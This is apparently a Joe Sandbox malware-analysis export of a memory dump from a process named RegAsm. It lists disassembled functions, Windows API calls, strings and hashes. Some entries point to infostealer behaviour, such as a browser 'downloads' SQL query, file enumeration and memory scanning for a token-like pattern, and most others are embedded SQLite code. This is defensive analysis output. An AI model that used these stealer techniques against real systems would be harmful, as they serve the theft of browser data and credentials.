Part of subcall function 00410CDD: GetFileAttributesA.KERNEL32(00000000,?,0040BAC2,?,00425C4E,?,?), ref: 00410CF6

Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6

Part of subcall function 00415E66: _EH_prolog.MSVCRT ref: 00415E6B
Part of subcall function 00415E66: GetProcessHeap.KERNEL32(00000000,0098967F,?,00000104), ref: 00415E83
Part of subcall function 00415E66: HeapAlloc.KERNEL32(00000000,?,00000104), ref: 00415E8A
Part of subcall function 00415E66: wsprintfA.USER32 ref: 00415EA2
Part of subcall function 00415E66: FindFirstFileA.KERNEL32(?,?), ref: 00415EB9
Part of subcall function 00415E66: StrCmpCA.SHLWAPI(?,004268EC), ref: 00415ED6
Part of subcall function 00415E66: StrCmpCA.SHLWAPI(?,004268F0), ref: 00415EF0
Part of subcall function 00415E66: wsprintfA.USER32 ref: 00415F14

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$H_prolog$FileHeapwsprintf$AllocAttributesFindFirstFolderPathProcesslstrcpy
String ID:
API String ID: 2058169020-0
Opcode ID: 27df2bee6747110bfdf8ae1cd169a3c4ba849b41f39ec8b444c4dbb6a37d260a
Instruction ID: c8bc0cfaec16e0a9c8e3cc6943dd29f550fca9c9c6472c90ce97e84fdf381955
Opcode Fuzzy Hash: 27df2bee6747110bfdf8ae1cd169a3c4ba849b41f39ec8b444c4dbb6a37d260a
Instruction Fuzzy Hash: A541FEB2D0022DAACF11EBE0DC49EDE77BCAF1D314F4005AAB505E3051EA78D7888B64

Function 1924B6E0 Relevance: 12.1, APIs: 8, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08f64e1515af12b5df65f8822e0a2758582b8801ab20261bb9d4203d7e75b7fd
Instruction ID: 6e076b3d0537e3507d87be1e2db3cee3f491511de9144abed651bbeaf08213d2
Opcode Fuzzy Hash: 08f64e1515af12b5df65f8822e0a2758582b8801ab20261bb9d4203d7e75b7fd
Instruction Fuzzy Hash: AB11B9F9C042107FDA04DB24EC40E6B7779FF99601FAC9458F84587251E736EA15D2A2

Function 192A7920 Relevance: 10.8, APIs: 7, Instructions: 338COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7c0a64c567377825aa826e38cd61e7aab24cd6bc2d57a6723dcf8eefeade29f
Instruction ID: fe178366b662fc9e5c6879541eb80bb1a02ec2a7f9e8f73b6b98bad36f7757dc
Opcode Fuzzy Hash: d7c0a64c567377825aa826e38cd61e7aab24cd6bc2d57a6723dcf8eefeade29f
Instruction Fuzzy Hash: 1EB1CFB6A04302ABC304DF28CD81A5AB7E9FF88314F485929F949C3B51E735F924CB95

Function 004074E2 Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 273stringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 004074E7

Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D

lstrlenA.KERNEL32(00000000), ref: 004077B3
lstrlenA.KERNEL32(00000000), ref: 004077C7

Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB

Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83

Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A

Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980

Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6

Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA

Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066

Strings

Downloads, xrefs: 00407517
Downloads, xrefs: 0040759A
SELECT target_path, tab_url from downloads, xrefs: 00407684

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prolog$lstrcpy$lstrlen$lstrcat$CreateObjectSingleThreadWait
String ID: Downloads$Downloads$SELECT target_path, tab_url from downloads
API String ID: 3193997572-2241552939
Opcode ID: 416b44e85fc3733463585f448a7a84164e2dfd5523e34dcb5518878b670905bc
Instruction ID: 1d83a0d3a3a48fb3eb3ae61e75267720847f9aac3d0a0fe70c8d3f25524eebd0
Opcode Fuzzy Hash: 416b44e85fc3733463585f448a7a84164e2dfd5523e34dcb5518878b670905bc
Instruction Fuzzy Hash: 74B15D71904248EADB15EBE5D956BDDBBB4AF18308F50407EE406725C2DF782B0CCB26

Function 19245930 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 234COMMON

Download Yara Rule

Strings

CREATE TABLE x(input, token, start, end, position), xrefs: 19245933
unknown tokenizer: %s, xrefs: 19245B28
simple, xrefs: 19245A38, 19245A84, 19245A95, 19245B27

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: CREATE TABLE x(input, token, start, end, position)$simple$unknown tokenizer: %s
API String ID: 0-2679805236
Opcode ID: 2e6c7b058b15691aad6148f5a5924054597e17ab6911f35338d40d279ad64925
Instruction ID: d6385b898148cfeadd3ce568e4a3e92f991a74c36a759a258c4bb6ee42d7c10b
Opcode Fuzzy Hash: 2e6c7b058b15691aad6148f5a5924054597e17ab6911f35338d40d279ad64925
Instruction Fuzzy Hash: AF71E2719043568FD708CF28CD84E5AB7E4FF84254F2C4629EC89D7645EB71EA05CBA2

Function 1934F0E0 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 216COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1934F1DC, 1934F31D
unable to delete/modify user-function due to active statements, xrefs: 1934F157, 1934F298
misuse, xrefs: 1934F1E6, 1934F327
%s at line %d of [%.10s], xrefs: 1934F1EB, 1934F32C

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$unable to delete/modify user-function due to active statements
API String ID: 0-3864549341
Opcode ID: 15c0be7b1e7754b40fbff7e209177beb18a7cbe4f1269680cc9a76284185cf1c
Instruction ID: b492a70aeb3907d9a3c4ee5dfe1a9ded6e081dbddf14a50e637d8c5e75a863b4
Opcode Fuzzy Hash: 15c0be7b1e7754b40fbff7e209177beb18a7cbe4f1269680cc9a76284185cf1c
Instruction Fuzzy Hash: 46618AB9600B417BF3118F20CC49B9777D8AF41304F6E4228F81A9B6C2E7B5E550CBA1

Function 192609C2 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 176COMMON

Download Yara Rule

Strings

cannot UPDATE a subset of columns on fts5 contentless-delete table: %s, xrefs: 19260B3B

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: cannot UPDATE a subset of columns on fts5 contentless-delete table: %s
API String ID: 0-2869280805
Opcode ID: fb0be50e0a3c14e69e651854d8bf468141da4fa921c50f61b8c9b837b967cb35
Instruction ID: 79fa715e7c852dc64a4a2fb230a7a0ea76400818419b0b81fcf65eb7bae8135a
Opcode Fuzzy Hash: fb0be50e0a3c14e69e651854d8bf468141da4fa921c50f61b8c9b837b967cb35
Instruction Fuzzy Hash: 3341E3B67013029FD700DF5AEC80966F3B4FF84265B18867AEA0587B60E736ED54D790

Function 19253F30 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 169COMMON

Download Yara Rule

Strings

separators=, xrefs: 192540A3
remove_diacritics=1, xrefs: 19253FA2
remove_diacritics=0, xrefs: 19253FE1
remove_diacritics=2, xrefs: 19254021
tokenchars=, xrefs: 1925406A

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: remove_diacritics=0$remove_diacritics=1$remove_diacritics=2$separators=$tokenchars=
API String ID: 0-131617836
Opcode ID: db6dafd5212db9d9c5758c28030f752e4a48955dfa191f78815a8cb9e18761a7
Instruction ID: a8b772c95b74769dc3c39386b906ef9d893206ff3c929cfdb9fb2501de255ced
Opcode Fuzzy Hash: db6dafd5212db9d9c5758c28030f752e4a48955dfa191f78815a8cb9e18761a7
Instruction Fuzzy Hash: 1E510276B041838BF3049F14C4417FAF7A1BB42724FAC91A8E84B4B685D732ED868B51

Function 19251120 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 169COMMON

Download Yara Rule

Strings

rbu_memory, xrefs: 192511F5
main, xrefs: 192511A6

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: main$rbu_memory
API String ID: 0-3973752345
Opcode ID: ac148ecafbcb07bae28bd3f0b69911bf425909744322d665c429e4331d65b000
Instruction ID: 89ae12b51f961b99ebd07a3176bc9713d44a9145bfe048f58df9c2e65f2b39b4
Opcode Fuzzy Hash: ac148ecafbcb07bae28bd3f0b69911bf425909744322d665c429e4331d65b000
Instruction Fuzzy Hash: B551E3716003529FE700CF65D980B9AB7E8FF45319F28816AED4AD7742D731E905CBA1

Function 19248C40 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 156COMMON

Download Yara Rule

Strings

winAccess, xrefs: 19248D60
delayed %dms for lock/sharing conflict at line %d, xrefs: 19248D35

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: delayed %dms for lock/sharing conflict at line %d$winAccess
API String ID: 0-1873940834
Opcode ID: d20dc1a685b643286e473778be62d5f609b039f1524d40ae8bea6f8544a9883d
Instruction ID: 02d167c6115a89278f79ee6d546f7d4d0c03b279488c2038e47706044195ffdb
Opcode Fuzzy Hash: d20dc1a685b643286e473778be62d5f609b039f1524d40ae8bea6f8544a9883d
Instruction Fuzzy Hash: 1741F8B6D16342DBC308EF38CD8155AFBA0AB95310FBD0A29F966532D0D670D944C683

Function 19359350 Relevance: 10.6, APIs: 7, Instructions: 144COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f079d0bc1cfed7b7d60a8d99899743870a26c7cc3418c22bed031e9f3f250eb4
Instruction ID: d8c16a365febc404e3bd49a594116fbec0d95b16993f70461738fe924734f373
Opcode Fuzzy Hash: f079d0bc1cfed7b7d60a8d99899743870a26c7cc3418c22bed031e9f3f250eb4
Instruction Fuzzy Hash: 2A5160B44006A8DBEB089B34DCC8E1B37B8BF0564AF494724ED0B92651DB35E954CB73

Function 192E15C0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 135COMMON

Download Yara Rule

Strings

JSON cannot hold BLOB values, xrefs: 192E16D9
%!0.15g, xrefs: 192E160A
null, xrefs: 192E15EE

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: %!0.15g$JSON cannot hold BLOB values$null
API String ID: 0-3074873597
Opcode ID: 42111ad3940f2e0ec5e5dfd9441a52f88719b360687eea724e0d9056509bdade
Instruction ID: fb248f5898ec55cba96224336ca108f61b7e868ee7eebd0b718717ad91a45e6c
Opcode Fuzzy Hash: 42111ad3940f2e0ec5e5dfd9441a52f88719b360687eea724e0d9056509bdade
Instruction Fuzzy Hash: 734189B5A007016BE3109B14ECC2BEB77B4FB41329F7C4639E551C66C3D3A9A59883E2

Function 19251D50 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 132COMMON

Download Yara Rule

Strings

no such database: %s, xrefs: 19251E05
CREATE TABLE x( name TEXT, path TEXT, pageno INTEGER, pagetype TEXT, ncell INTEGER, payload INTEGER, unused INTEGER, mx_payload INTEGER, pgoffset INTEGER, pgsize INTEGER, schema TEXT HIDDEN, aggregate BOOLEAN HIDDEN), xrefs: 19251E2C

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: CREATE TABLE x( name TEXT, path TEXT, pageno INTEGER, pagetype TEXT, ncell INTEGER, payload INTEGER, unused INTEGER, mx_payload INTEGER, pgoffset INTEGER, pgsize INTEGER, schema TEXT HIDDEN, aggregate BOOLEAN HIDDEN)$no such database: %s
API String ID: 0-1404816483
Opcode ID: 226255afca6e38e60153a091b71e58f8e659aab34dc7c62aa5a520fb09c42df7
Instruction ID: f24eca8e920c043f3ddac416c03e0373088149e2416217316eacba719114adec
Opcode Fuzzy Hash: 226255afca6e38e60153a091b71e58f8e659aab34dc7c62aa5a520fb09c42df7
Instruction Fuzzy Hash: B731CE7660030A6BD3106F29DC00B9BB7DCFF45212F598165FD599B341DA76FA0087E0

Function 0040F388 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 129stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 0040F39C
??_U@YAPAXI@Z.MSVCRT ref: 0040F3BD

Part of subcall function 0040F1D6: strlen.MSVCRT ref: 0040F1E2
Part of subcall function 0040F1D6: strlen.MSVCRT ref: 0040F1F8
Part of subcall function 0040F1D6: strlen.MSVCRT ref: 0040F291

VirtualQueryEx.KERNEL32(?,00000000,?,0000001C,?,?,?,?,?,?,00000000,?,65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30,00000000,00000000,000000FF), ref: 0040F3EA
VirtualQueryEx.KERNEL32(?,00000000,?,0000001C), ref: 0040F4B4
??_V@YAXPAX@Z.MSVCRT ref: 0040F4C5

Strings

@, xrefs: 0040F403

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
